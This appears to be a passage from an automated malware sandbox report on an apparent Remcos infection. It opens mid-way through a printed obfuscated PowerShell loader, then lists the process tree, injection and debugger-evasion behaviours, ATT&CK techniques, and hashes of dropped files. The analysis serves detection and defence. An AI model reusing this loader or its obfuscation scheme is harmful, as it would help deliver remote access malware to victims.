eBrevoPVidunlBeh,nAMegald delsBlokdEDolibRW altnNon ee Gours Anke= Noct(Enes tAdenoeJordesTrykstCu,pa- ointpPhycia utistCosmohForp Suffr$Ethnor CrepIRenowM Mi iiStrateP,lemr Nu m1Older3Phant1Visit)Hexam ');while (!$Studiepladsernes) {unhoard (Sereh 'Total$diskrg VrdilWh.ngoOverfbOrnita progl.verd:Sai aAOrgansI,eith Eidepfu,zelDigenaDelinnAfha tKabinsSt,ic=Tarnk$PalomtKup erAnp rusp,lleBlenn ') ;unhoard $Dekoreredes;unhoard (Sereh 'sparrSF nantAffolaInsolrGe.gatBrans- Si kSNonu.l BetseCorneeBeaujpvilia Senso4Rense ');unhoard (Sereh 'Stn p$Afr ggUbarblS ernoFaresbParafaHder,lInfek:AmmonS.fstetBaviaunomindWa deiNonfleHureapKurvelWei eaRetfrdE ingsIoni e Ko.trBioscnWeitseNab.ls.rkra=Nedfl(HylerT SleteCad tsBestitSprea-Ko,lePTalkiaFredstP rtuhfolke rus y$Con.iR,reoriPorsemSldefiHul,oetrogorTraum1 Skib3Trans1 I dr) Ly.t ') ;unhoard (Sereh 'Polyc$ Lykng Bodil,ctogo pecbSlowuadambrlGeogr:Yipv MSuccebP veblBant eSuppur Bestn BlideToste=Magni$Fors gVirkslBlecioLe,tybHyleraSk,ttlUdmrk:Sank BNon iaJonissL gosiKvs.enAnnuia PigesA ouriEnzyma P,onl Re u+kart + Surf%Folk,$AnikiPSpandoundisnSa ted SubceEpi.ori.veraIndpatDyspeiS ackoLe.finNonpo.Immanc I.mbo naruBenzynSwindtStemn ') ;$Otelcosis=$Ponderation[$Mblerne];}$Urskovsmrket=335640;$Tvivlsommerendri=27847;unhoard (Sereh 'Calci$IndaagD ssulThoraoKlaribTrs ia Metelfo db:OleacNtvinee Eurot bransAfsyrt Perpi,uppukDisrek bogreToyintCyklu Epos.=By,on Ud,kGafs nesyrphtKon.e-ChampCKommuoSkot nUnph t Pam eSeksun Lap.tOra g C li$Car aRFor wiFdselmHerniizarnieUnderrSyncr1Forsk3 Siza1Troi ');unhoard (Sereh 'Dec,m$Bobesg Eftel sagloKonsub,heotaSamf lEctom:bamseP B ckaCitolaMis ek,nvesrS rubeDishwn Wa ddBrak e Giri Logbo=Pre r Betrk[UnseaSkamplyolioss VefrtDiskeeHomeomApr.t.AscenC GangoFor lnUnporvRobeneDeplor So,ttUk,nt]Alkyl:A tho:FarveFSpinur Deplolunefm lysB T rba Snk sUnderepindl6Telef4Jims S anmatSnerprstatsi Domen,asarg typ,(Emb r$Skr uNn nebeSmrbotPh tosN.npetSuperiHeadfkTenorkGrunde.tatit Erhv) Raff ');unhoard (Sereh 'Yvonn$bardeghermelNonpao PegsbModsta B,skloppeb:GeigePPoloioGui ar .nobsGal o Ca t=Komme Impeo[DeadeSFigury nversOm,attLandfe kolkm K.nt.ArbejTMalapeTrianxBoreptOkeru.Pous EOverlnhlde cVelu.oForspd Ulc iNidd nM,strgHarpa]V,lut: f ik:m,lliA R.suSPhyciCknusmIDri tINiche.SladdG etmleGangwtInappS irkt H rrr R ntiForlanByporgRets (Ch on$AnthePSmagnaTrigla.revlkunquerkongeeshad nSoe,ed Col eSyste) Srkl ');unhoard (Sereh 'Fjern$ N,trg bratl Om toOverfbUndf a PhytlMelod:UdrmmKOver,iMu ams apitrTidssaFemto1Urano4 inti=No me$DeminP Trskognaverknbuks U de.MelansLo.ryuS ckebIdomesSt mmtNedsnr BramiAttringen.tgauthe(Gra s$,apabU SlavrS,ampsOptr.k K.ntoSkeldv Erods K ebm KlunrpaaklkStnineFranat Vrdi, vic$ChronTReklavMisdoiAntsivSubtrlSkylds ParaodelagmC lotmUnderekry drPersoeCr menVo.dsdRe,nnr forsiSp.og) Sprr ');unhoard $Kisra14;"
      4⤵
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1516
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Financiered.adv && echo t"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1520
    - - C:\Program Files (x86)\windows mail\wabmig.exe
        
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        5⤵
        Suspicious use of NtCreateThreadExHideFromDebugger
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:2856

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
b47b14468c14ab9cafcc86a5b6258ee2

SHA1
ecc3854b6f8c96dfe6e351cbf4a1c7eac79ccd19

SHA256
0201e2d4e4dff90b4f8959892a4439819b23fa56626c6c0d6e13f96581e81637

SHA512
022ce05354349a9f01139a8aacf039f4ac40b18cc2d787ad2ce24b252449ca8c9fbef696e4ef1562bd0efd82259a86da5b351da7fb2e56fa383fc82eec0740c3

Download Submit
C:\Users\Admin\AppData\Roaming\Financiered.adv

Filesize
473KB

MD5
2a226c84235f25cf9bee2bade90f7fc9

SHA1
c449226b64715a81000c566e37677b25953a7e4a

SHA256
d18add82262d9ddf210db5843c8a35b049e7d150c204bf22a77e9bd546f7eda3

SHA512
e57f9f378a53ab77e7306efb81aa806462353121ea3b0a4c8ae7549be1bdf00ea224d1f20e10956ba31cc8b6c63264193f6c2dfdf7e958747d8aa26cc0008be7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KXRG5I8IR96UO7O1LGC9.temp

Filesize
7KB

MD5
1e56e67b16e715baa1b0e1280cd93b79

SHA1
26d7158e46d5120f6d5acd5bd1503e345a8bd2f5

SHA256
bb21b68ec09cc042dbd4e85fd5f8a75f55254445e9b64c907fbdb4fc99184185

SHA512
bbe17ba01e7e2b613211ab7bbdbe666c90c31e93c44c75a722fb7ab54b62d1f68f93ebce7162ea6a2285c0a7ce976afd235a0d40b71f0315086d7f5527ef35e4

Download Submit
memory/1516-19-0x0000000006210000-0x00000000096F4000-memory.dmp

Filesize
52.9MB

Download
memory/2704-8-0x000007FEF4760000-0x000007FEF50FD000-memory.dmp

Filesize
9.6MB

Download
memory/2704-7-0x000007FEF4760000-0x000007FEF50FD000-memory.dmp

Filesize
9.6MB

Download
memory/2704-10-0x000007FEF4760000-0x000007FEF50FD000-memory.dmp

Filesize
9.6MB

Download
memory/2704-11-0x000007FEF4760000-0x000007FEF50FD000-memory.dmp

Filesize
9.6MB

Download
memory/2704-13-0x000007FEF4760000-0x000007FEF50FD000-memory.dmp

Filesize
9.6MB

Download
memory/2704-14-0x000007FEF4A1E000-0x000007FEF4A1F000-memory.dmp

Filesize
4KB

Download
memory/2704-4-0x000007FEF4A1E000-0x000007FEF4A1F000-memory.dmp

Filesize
4KB

Download
memory/2704-9-0x000007FEF4760000-0x000007FEF50FD000-memory.dmp

Filesize
9.6MB

Download
memory/2704-6-0x0000000002410000-0x0000000002418000-memory.dmp

Filesize
32KB

Download
memory/2704-5-0x000000001B380000-0x000000001B662000-memory.dmp

Filesize
2.9MB

Download
memory/2704-46-0x000007FEF4760000-0x000007FEF50FD000-memory.dmp

Filesize
9.6MB

Download
memory/2856-44-0x00000000004A0000-0x0000000001502000-memory.dmp

Filesize
16.4MB

Download
memory/2856-45-0x0000000001510000-0x00000000049F4000-memory.dmp

Filesize
52.9MB

Download
memory/2856-22-0x0000000001510000-0x00000000049F4000-memory.dmp

Filesize
52.9MB

Download

Analysis

Sharing